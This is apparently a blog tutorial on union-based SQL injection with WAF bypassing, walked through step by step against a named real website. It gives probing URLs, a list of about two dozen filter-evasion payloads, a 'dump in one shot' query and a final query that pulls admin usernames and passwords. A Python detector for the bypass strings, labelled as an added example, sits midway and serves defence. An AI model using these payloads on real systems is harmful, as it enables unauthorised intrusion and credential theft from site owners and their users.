Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades


This follows our tutorial on the basics of SQL injection.
Union based SQL injection + WAF bypassing, by Adesh

Today I am going to discuss union based SQL injection and WAF bypassing techniques.
Let's start injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'



We get a MySQL error.
Let's balance our query for further injection by closing off the rest of it with one of the following terminators:

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here is a small explanation of balancing and commenting in our injection.



After balancing our query, the next step is to count the total number of columns.
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No error!
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No error!

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 6-- -
Again no error!

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 7-- -
Here we get an error! So the query has 6 columns.

Now try to find our vulnerable columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3'  union select 1,2,3,4,5,6-- -



If our target site is protected with a WAF, the WAF will block our query and give us a mod_security error.
So here are some WAF bypassing methods:
    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
Just replace the union select in the query with one of the bypass strings above.
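As an added example (not part of the original tutorial): detection logic that a WAF rule or a log-review script needs in order to see through the comment and encoding tricks listed above. It decodes the parameter the way PHP does, resolves MySQL comments the way the database lexer does, and only then looks for UNION ... SELECT, so the payloads above and the plain form are treated the same. The sample values are constructed from the list above; normalize and is_union_injection are my own names.

```python
import re
from urllib.parse import unquote_plus

# Matches "union select", "union all select", "union(select", ...
UNION_SELECT = re.compile(
    r"\bunion\b\s*(?:(?:all|distinctrow|distinct)\s+)?\(?\s*\bselect\b")

def normalize(raw: str) -> str:
    """Lower-cased SQL with comments resolved as MySQL's lexer resolves them."""
    # PHP decodes the query string before MySQL sees it, so decode first;
    # decoding twice also catches double-encoded input such as %252f.
    s = unquote_plus(unquote_plus(raw))
    out, i, n = [], 0, len(s)
    while i < n:
        if s.startswith("/*!", i):            # version comment: body is executed
            i += 3
            while i < n and s[i].isdigit():   # skip the optional version number
                i += 1
        elif s.startswith("/*", i):           # ordinary comment acts as whitespace
            end = s.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif s.startswith("*/", i):           # end of a version comment
            i += 2
            out.append(" ")
        elif s[i] == "#" or s.startswith("-- ", i):  # comment to end of line
            end = s.find("\n", i)
            i = n if end < 0 else end
            out.append(" ")
        else:
            out.append(s[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()

def is_union_injection(raw: str) -> bool:
    """True if the decoded, comment-resolved value contains UNION ... SELECT."""
    return UNION_SELECT.search(normalize(raw)) is not None

if __name__ == "__main__":
    # Constructed sample values: bypass strings from the list above plus two
    # benign values that a naive "union select" string match would misjudge.
    samples = ["/*!%55NiOn*/ /*!%53eLEct*/",
               "%55nion(%53elect 1,2,3)-- -",
               "-3' /*!50000union */ select 1,@@version,3,4,5,6-- -",
               "+#1q%0AuNiOn all#qa%0A#%0AsEleCt",
               "3", "labour union selected"]
    for value in samples:
        print(f"{is_union_injection(value)!s:5} {value!r}")
```

Strings such as un/**/ion or uni%0bon split the keyword itself and are not valid MySQL, so the normalizer correctly leaves them unmatched; matching on the resolved query rather than the raw bytes is the point.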

Let's continue our tutorial.
Here are some methods for checking vulnerable columns, with examples.
Using and 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using and false
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+


Using a negative id
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

For our target we use /*!50000union */ and concat/*!50000()*/:

http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,2,3,4,5,6-- -

We will get our vulnerable columns printed on the page. 2 is our vulnerable column.


Here are some MySQL variables and functions:
@@version         = current version
@@GLOBAL.VERSION  = current version
user()            = current user
database()        = current database

For the version: http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,@@version ,3,4,5,6-- -

We can see the current version printed on the page.
The next step is to get the tables; we use a DIOS (dump in one shot) query for that.

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Let's execute our DIOS query.



We can see all the tables in our primary database.
Now, if you want to get the admin details of the target site, check the name of the admin table and then write the query.
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -


For the video tutorial:

Enjoy :]
Tutorial By Adesh kolte
Contact us on FB
https://www.facebook.com/kolteAdesh